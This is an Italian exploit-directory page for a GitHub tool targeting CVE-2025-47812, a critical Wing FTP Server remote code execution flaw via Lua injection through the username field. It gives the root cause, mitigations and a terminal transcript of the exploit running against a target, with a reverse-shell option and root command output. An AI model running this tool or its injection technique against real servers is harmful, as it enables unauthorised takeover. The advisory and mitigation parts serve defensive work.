Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Strumenti/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2025-47812 – RCE Critico in Wing FTP Server 🛡️

🔎 Panoramica:

CVE-2025-47812 è una vulnerabilità critica di esecuzione remota di codice (RCE) che colpisce Wing FTP Server versioni precedenti alla 7.4.4. È stata scoperta da un ricercatore di sicurezza ed è stata confermata come attivamente sfruttata in ambiente reale.


🧱 Causa Principale:

La vulnerabilità risiede nella logica di autenticazione di Wing FTP Server, in particolare nel modo in cui gestisce i byte nulli (\0) nel parametro username.

Gli attaccanti possono iniettare codice Lua arbitrario attraverso il campo username, che il server scriverà nel file di sessione. Quando questo file di sessione viene elaborato successivamente, il codice Lua iniettato viene eseguito, consentendo agli attaccanti di eseguire comandi a livello di sistema.


🚨 Impatto:

  • Gravità: Punteggio CVSS di 10.0 (Critico)
  • Accesso Richiesto: L'accesso non autenticato o anonimo è sufficiente
  • Sfruttamento: Sfruttamento attivo confermato
  • Privilegi Ottenuti: Il codice viene eseguito come (Windows) o (Linux/macOS)
Scarica lo strumento
SYSTEM
root
  • Piattaforme Colpite: Windows, Linux e macOS

  • 🔧 Mitigazione:

    • Aggiornare immediatamente a Wing FTP Server versione 7.4.4 o successiva.
    • Assicurarsi che i server FTP esposti pubblicamente non espongano /loginok.html a reti non fidate.
    • Monitorare i log per nomi utente insoliti o iniezioni di codice Lua.
    • Implementare la segmentazione di rete per isolare i servizi FTP dall'infrastruttura interna.

    💀 Exploit:

    root@kitploit:~
    ┌──(kali㉿kali)-[~]
    └─$ sudo python3 CVE-2025-47812.py
    ============================================================
       CVE-2025-47812 - Wing FTP Server RCE Exploit
    ============================================================
    Target URL (e.g., http://localhost:5466): http://10.10.10.10
    Username (e.g., anonymous): anonymous
    1) Run Command
    2) Get Reverse Shell
    Your choice (1 or 2): 1
    Command to execute (default: whoami): id
    [*] Trying to get UID... Payload: id
    [*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
    [*] Sending /dir.html request...
    [*] HTTP 200
    ------ Response Start ------
    uid=0(root) gid=0(root) groups=0(root)
    <?xml version="1.0" encoding="UTF-8" ?>
    <alldata><nowdir><![CDATA[/]]></nowdir>
    <dirdata>
    </dirdata>
    <nowquota>0</nowquota>
    <maxquota>0</maxquota>
    <readfile>1</readfile>
    </alldata>
    
    
    ------ Response End ------
    

    ⚠️ Disclaimer

    Questo exploit è fornito solo a scopo educativo. Usalo responsabilmente e solo su sistemi per i quali hai esplicita autorizzazione di test. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.